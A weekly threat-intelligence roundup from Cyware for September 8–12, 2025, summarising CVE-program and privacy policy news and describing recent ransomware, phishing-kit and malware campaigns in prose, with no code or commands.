Cyware Weekly Threat Intelligence, September 08–12, 2025
The Good
CISA’s new playbook is shaking up the CVE program. Its Quality Era pushes for better automation, APIs, and data standards. With a focus on transparency and global partnerships, it aims to keep vulnerability management vendor-neutral and collaborative. California’s latest privacy law is forcing browsers to step up. Every website visit will carry user requests to block third-party data grabs, boosting consumer control.
CISA has released a strategic document, CVE Quality for a Cyber Secure Future, outlining its commitment to the CVE program, emphasizing the need for public maintenance and vendor neutrality. This initiative, termed the "Quality Era," aims to enhance the program's leadership and funding mechanisms while encouraging broader multi-sector engagement. Key priorities include modernizing CVE operations through improved automation, API support, and data quality standards. The roadmap also focuses on enhancing transparency and communication within the CVE ecosystem. The CISA intends to leverage partnerships with international organizations and various stakeholders to ensure comprehensive representation and collaboration, marking a significant transition from the previous "Growth Era" to a more quality-focused approach in vulnerability management.
California has passed a bill mandating web browsers to include a feature that allows consumers to automatically opt out of data sharing with third parties. This legislation builds on the California Consumer Privacy Act, which grants consumers the right to send opt-out preference signals. The law will require browsers to enable users to send opt-out requests to every website they visit.
The Bad
Akira ransomware is busting into networks through SonicWall's CVE-2024-40766 flaw. ACSC warns of fresh exploits since September, with 40 incidents probed. A rogue Chrome extension, Madgicx Plus, is preying on Meta advertisers with a slick AI optimization pitch. This malware, spread through polished domains tied to past scams, hijacks Google and Facebook accounts, siphoning off valuable ad assets with deceptive ease. Masquerading as harmless GitHub files, Kimsuky is sneaking malware into systems with malicious LNK files.
The Akira ransomware gang is exploiting CVE-2024-40766, a critical vulnerability in SonicWall SSL VPN devices, to gain unauthorized access to networks via unpatched endpoints. SonicWall released a patch for CVE-2024-40766 in August 2024 but emphasized that password resets are necessary to prevent exploitation of exposed credentials. Akira ransomware began exploiting this vulnerability in September 2024, with recent activity prompting warnings from the ACSC. SonicWall clarified that the recent activity is linked to CVE-2024-40766 and not a zero-day vulnerability, with investigations into 40 related security incidents.
A malicious Chrome extension campaign is targeting Meta (Facebook/Instagram) advertisers by masquerading as a legitimate AI-driven ad optimization tool called Madgicx Plus. This extension, promoted as a productivity enhancer, actually functions as malware capable of hijacking business sessions and stealing credentials. The campaign utilizes a network of professionally crafted domains, some previously linked to other malicious activities, to distribute the compromised extension. It captures Google account details before prompting users to connect their Facebook accounts, thereby broadening its access to valuable advertising assets. The reuse of infrastructure and domains indicates that this campaign is an evolution of prior malicious efforts rather than isolated incidents.
North Korea–backed Kimsuky has been observed exploiting GitHub repositories for malware delivery and data exfiltration. They utilize malicious LNK files that execute PowerShell scripts to download additional payloads from private GitHub repositories. These scripts, which include hardcoded GitHub Private Tokens, gather system metadata such as boot time, OS configuration, and running processes, subsequently uploading this information to attacker-controlled repositories. The malware establishes persistence by creating scheduled tasks that enable the execution of updated scripts at regular intervals. Investigations have linked Kimsuky to nine private repositories containing exfiltrated logs, decoy documents, and files resembling payment reminders.
Microsoft released security updates for 81 flaws, including two zero-day vulnerabilities: CVE-2025-55234 (Windows SMB Elevation of Privilege) and CVE-2024-21907 (Improper Handling of Exceptional Conditions in Newtonsoft.Json). The updates address nine critical vulnerabilities, including remote code execution, information disclosure, and elevation of privilege issues. Microsoft recommends enabling SMB Server Signing and SMB Server Extended Protection for Authentication to mitigate relay attacks, but warns of potential compatibility issues. Updates for Microsoft SQL Server include fixes for vulnerabilities in Newtonsoft.Json, addressing denial of service risks caused by crafted data.
Threat hunters have discovered 45 previously unreported domains associated with the China-linked cyber espionage groups Salt Typhoon and UNC4841, with some domains dating back to May 2020. These findings indicate that Salt Typhoon was involved in activities prior to the notable attacks in 2024. The identified domains share some overlap with UNC4841, known for exploiting a critical vulnerability in Barracuda Email Security Gateway appliances. Investigations revealed that many domains were registered using fake identities and Proton Mail addresses, with some pointing to high-density IP addresses. The oldest domain linked to these espionage campaigns, onlineeylity[.]com, was registered on May 19, 2020, by a fictitious persona, underscoring the long-term nature of these cyber threats.
Cybercriminals are intensifying their attacks on macOS users by deploying the Odyssey stealer through a fraudulent Microsoft Teams download site. This sophisticated campaign involves attackers impersonating Microsoft Teams via the domain teamsonsoft[.]com, complete with official branding to deceive victims. When users attempt to download what they believe is the legitimate application, they are prompted to execute a command that installs the malware. The Odyssey stealer is capable of extensive data theft, targeting sensitive information such as browser credentials, cryptocurrency wallet data, and system details. It employs social engineering tactics to gain elevated privileges and maintains persistence by replacing legitimate applications. The stolen data is exfiltrated to the attackers' C2 server, making it a significant threat to macOS users.
iCloud Calendar invites are being exploited to send phishing emails disguised as payment notifications, originating from Apple’s email servers to bypass spam filters. The phishing emails aim to scare recipients into calling a fake support number, where scammers attempt to gain remote access to steal money, deploy malware, or extract sensitive data. These phishing emails pass email security checks (SPF, DKIM, DMARC) and appear legitimate due to their origin from Apple’s servers. Scammers use the Notes field in iCloud Calendar invites to embed phishing messages and send them to mailing lists, targeting multiple victims.
New Threats
Mustang Panda's latest ToneShell variant is digging deep into systems with slick persistence moves. Delivered via DLL sideloading in archives, it dodges analysis, enforces single-instance rules, and sets up scheduled tasks in user directories. Researchers uncovered a RAT storm hitting Chinese users since May. Phishing on GitHub Pages drops ValleyRAT, FatalRAT, and kkRAT, the latter echoing Ghost RAT with beefed-up encryption and commands. Slipping through macOS like a shadow in the fog, ChillyHell malware cloaks itself as a harmless app to wreak havoc.
A new variant of the ToneShell backdoor, attributed to the Mustang Panda group, has emerged with advanced persistence and anti-analysis capabilities. Delivered through DLL sideloading within compressed archives, this variant employs sophisticated anti-analysis techniques to evade detection. It checks the execution environment to prevent self-infection and enforces a single-instance policy. The malware establishes persistence by copying itself and essential DLLs to a user profile directory and creates a scheduled task to ensure it runs regularly. Communication with its command and control server is disguised using a TLS-like protocol, and the payloads are XOR-obfuscated. This variant also generates unique GUIDs for each infected machine, ensuring continued operation.
VoidProxy is a sophisticated PhaaS platform that leverages AitM techniques to compromise Microsoft and Google accounts by bypassing MFA. It operates using compromised email accounts and employs various evasion tactics, including URL obfuscation and disposable phishing domains, to avoid detection. Phishing campaigns begin with emails that contain shortened links leading to these domains, which are protected by Cloudflare CAPTCHA challenges. The attack unfolds in several stages, from delivery to session hijacking, allowing attackers to capture sensitive information like usernames, passwords, and MFA codes. VoidProxy’s backend features a web-based admin console that enables real-time management of phishing campaigns and stolen data extraction, making it a potent tool for cybercriminals.
Zscaler ThreatLabz discovered a malware campaign targeting Chinese-speaking users since May 2025, delivering ValleyRAT, FatalRAT, and kkRAT. kkRAT shares code similarities with Ghost RAT and Big Bad Wolf, with enhanced encryption and additional commands. The campaign uses phishing sites hosted on GitHub Pages to deliver malicious installer packages. kkRAT employs sandbox/VM detection techniques, including time stability analysis and hardware configuration checks. kkRAT uses shellcodes for multi-stage attacks, with decrypted payloads delivered via structured Base64-encoded data. Commands supported by kkRAT include clipboard hijacking for cryptocurrency wallet replacement, persistence establishment, and installing RMM tools like Sunlogin and GotoHTTP.
ChillyHell is a sophisticated macOS malware that has recently emerged, utilizing advanced techniques to evade detection and maintain persistence. This malware employs three primary methods for persistence: LaunchAgent, LaunchDaemon, and shell profile injection, allowing it to execute upon user login or system boot. It masquerades as a benign application while actively collecting environmental data and profiling the host system. Notably, ChillyHell has remained notarized by Apple, which underscores its stealth capabilities. Its modular architecture enables various malicious activities, including spawning reverse shells, downloading payloads, and conducting brute force attacks on user credentials.
Salty2FA is a new and advanced phishing kit that targets enterprises in the U.S. and EU, designed to bypass various two-factor authentication methods. This PhaaS framework has been identified in campaigns targeting sectors such as finance, energy, and telecom. It employs multi-stage execution tactics, starting with convincing email lures that prompt urgency, leading victims to fake login pages that mimic legitimate sites. Once credentials are entered, the kit can intercept 2FA codes, allowing attackers to gain unauthorized access to accounts.
A new backdoor malware known as Buterat is spreading through phishing emails and trojanized downloads, primarily targeting government and enterprise networks. Once it infiltrates a device, Buterat hides within normal system processes and modifies registry keys to ensure persistence even after reboots. Utilizing advanced techniques like SetThreadContext and ResumeThread, it hijacks execution flow to evade detection by security systems. The malware communicates with remote C2 servers through encrypted channels, complicating identification efforts. During live testing, researchers noted that Buterat drops multiple payloads, such as amhost.exe and bmhost.exe, which enhance the attackers' control and capabilities.
MostereRAT is a sophisticated malware that initiates attacks through phishing emails targeting Japanese users, leading to the download of malicious payloads. It employs Easy Programming Language to create encrypted tools that bypass security measures and gain full control over infected systems. The malware operates by establishing SYSTEM-level privileges, using custom RPC communication, and creating persistent services. It effectively disables antivirus solutions and Windows security features, blocking their traffic to evade detection. MostereRAT communicates with C2 servers using mutual TLS for secure operations and leverages popular remote access tools like AnyDesk and TightVNC to maintain control. Additionally, it collects sensitive victim information and performs screen captures for data exfiltration.